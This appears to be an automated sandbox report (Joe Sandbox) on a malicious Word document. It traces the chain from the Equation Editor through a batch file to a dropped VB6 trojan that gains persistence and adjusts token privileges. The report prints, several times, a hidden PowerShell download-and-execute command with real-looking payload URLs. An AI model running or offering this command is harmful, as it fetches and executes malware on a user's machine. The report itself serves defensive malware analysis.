Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''			Jump to behavior

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,

18_2_00415D50

PE file contains an invalid checksum

Show sources

Source: ounehcnaykuL.exe.10.dr	Static PE information: real checksum: 0x24b51 should be: 0x46e3d
Source: ounehcnaykuM.exe.15.dr	Static PE information: real checksum: 0x24b51 should be: 0x46e3d

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_00415CCB push ebx; ret	18_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001F3959 push ecx; ret	18_2_001F396C
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00415CCB push ebx; ret	21_2_00415CCC
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00183959 push ecx; ret	21_2_0018396C

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,		18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,		21_2_00172530

System Summary:

Dropped file seen in connection with other malware

Show sources

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe 492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 87.247.241.143 80

Jump to behavior

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,	18_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E67C0 NtQueryInformationProcess,	18_2_001E67C0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,	21_2_00415D50
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_001767C0 NtQueryInformationProcess,NtQueryInformationProcess,	21_2_001767C0

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

18_2_001EC430

Creates files inside the system directory

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

File created: C:\Windows\TEMP\~DF7F9397C12E76BC41.TMP

Jump to behavior

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Mutant created: \Sessions\1\BaseNamedObjects\789C000000000
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Mutant created: \BaseNamedObjects\789C000000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Deletes Windows files

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

File deleted: C:\Windows\Temp\VBB688.tmp

Jump to behavior

Detected potential crypto function

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EFE30	18_2_001EFE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001F21B0	18_2_001F21B0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017FE30	21_2_0017FE30
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_001821B0	21_2_001821B0

Document contains no OLE stream with summary information

Show sources

Source: VBA869.tmp.14.dr	OLE indicator has summary info: false
Source: VB8E64.tmp.16.dr	OLE indicator has summary info: false
Source: VBB688.tmp.20.dr	OLE indicator has summary info: false

Document has an unknown application name

Show sources

Source: VBA869.tmp.14.dr	OLE indicator application name: unknown
Source: VB8E64.tmp.16.dr	OLE indicator application name: unknown
Source: VBB688.tmp.20.dr	OLE indicator application name: unknown

Document misses a certain OLE stream usually present in this Microsoft Office document type

Show sources

Source: VBA869.tmp.14.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VB8E64.tmp.16.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: VBB688.tmp.20.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Show sources

Source: ounehcnaykuL.exe.10.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ounehcnaykuM.exe.15.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Binary contains paths to development resources

Show sources

Source: ounehcnaykuM.exe, 00000010.00000000.10221288120.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000012.00000000.10355250967.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000014.00000000.10399473117.00401000.00000020.sdmp, ounehcnaykuM.exe, 00000015.00000000.10613423172.00401000.00000020.sdmp, ounehcnaykuL.exe.10.dr	Binary or memory string: @pA*\AE:\56202002\Likelihood.vbp
Source: ounehcnaykuM.exe, 00000010.00000001.10223541229.00417000.00000004.sdmp, ounehcnaykuM.exe, 00000014.00000002.10617465195.00417000.00000004.sdmp	Binary or memory string: @*\AE:\56202002\Likelihood.vbp

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.expl.troj.winDOCX@23/42@10/4

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001F3130 LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,	18_2_001F3130
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EFBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,	18_2_001EFBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EC430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,	18_2_001EC430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017C430 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,	21_2_0017C430
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017FBD0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,	21_2_0017FBD0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00183130 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	21_2_00183130

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E7850 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,OpenProcess,CloseHandle,

18_2_001E7850

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001EEAC0 CoCreateInstance,CoCreateInstance,CoCreateInstance,

18_2_001EEAC0

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001EF7D0 FindResourceW,LoadResource,LockResource,

18_2_001EF7D0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$RMP16T.docx

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRB147.tmp

Jump to behavior

Document contains summary information with irregular field values

Show sources

Source: VBA869.tmp.14.dr	OLE document summary: title field not present or empty
Source: VBA869.tmp.14.dr	OLE document summary: author field not present or empty
Source: VBA869.tmp.14.dr	OLE document summary: edited time not present or 0
Source: VB8E64.tmp.16.dr	OLE document summary: title field not present or empty
Source: VB8E64.tmp.16.dr	OLE document summary: author field not present or empty
Source: VB8E64.tmp.16.dr	OLE document summary: edited time not present or 0
Source: VBB688.tmp.20.dr	OLE document summary: title field not present or empty
Source: VBB688.tmp.20.dr	OLE document summary: author field not present or empty
Source: VBB688.tmp.20.dr	OLE document summary: edited time not present or 0

Executes batch files

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...+...........................A.p.p.D.a.t.a.\.L.o.c.a.Z!.\|..+.H.+......EZJ....@.+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.................@.[J..+...>w@.[J..C.....L.+.(.....+....v..+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................c.a.l.l.l...x...@...7.....................................+..b=w..Du`...L.+.T.+...+................v	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.....l...x...@...=.............................................+..b=w.<.\|X.+.....j....EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...E...............................j...............@F[J.<.\|x.+...+......EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...L...........................A.p.p.D.a.t.a.\.L.o.c.a..$.\|..+...+......EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........p.D.a.t.a.\.L.o.c.a..$.\|..+.(.L...+.(.....+....v..+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................#.c.a.l.c...e.x.e...X.............................C.<.XJ.....b=w..Du\.....+...+...+................v	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...^.............................+...+.(.L.....(.L.....2&.\|@.+...+......EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ........1#........... ..\|.+...+.E.XJ........1#......@F[J. ..\|.+...C.....V.XJ............\|.+.......}u........`.....,.....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...v...........................A.p.p.D.a.t.a.\.L.o.c.a..$.\|..+...+......EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................P.o.w.e.r.S.h.e.l.l.......................................+..b=w..Du\.....+...+...+................v	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.....l...x...@.................................................+..b=w.&.\| .+..........EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ............................l...x...@...................................................@F[J2&.\|@.+...+......EZJ......+.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ........1#........... ..(.+...+.E.XJ........1#......@F[J. ..(.+...C.....V.XJ............(.+.......}u........`.....,.....	Jump to behavior

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Show sources

Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Section loaded: C:\Windows\System32\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Section loaded: C:\Windows\System32\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Section loaded: C:\Windows\System32\msvbvm60.dll	Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
